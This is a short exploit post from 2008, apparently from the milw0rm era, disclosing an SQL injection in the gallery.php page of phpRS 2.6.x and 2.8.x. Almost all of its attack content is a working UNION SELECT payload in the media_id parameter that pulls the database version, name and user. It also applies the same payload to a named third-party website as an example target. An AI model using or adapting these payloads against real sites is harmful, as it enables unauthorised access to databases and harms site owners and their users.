[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] phpRS 2.6.x and 2.8.X (gallery.php) SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/download.php
[~]
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm staff
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :- gallery.php?akce=obrazek_ukaz&media_id=
[~]
[~] http://site.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNION SELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]
[~] Ex :-
[~]
[~] http://www.kobravs.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNIONSELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------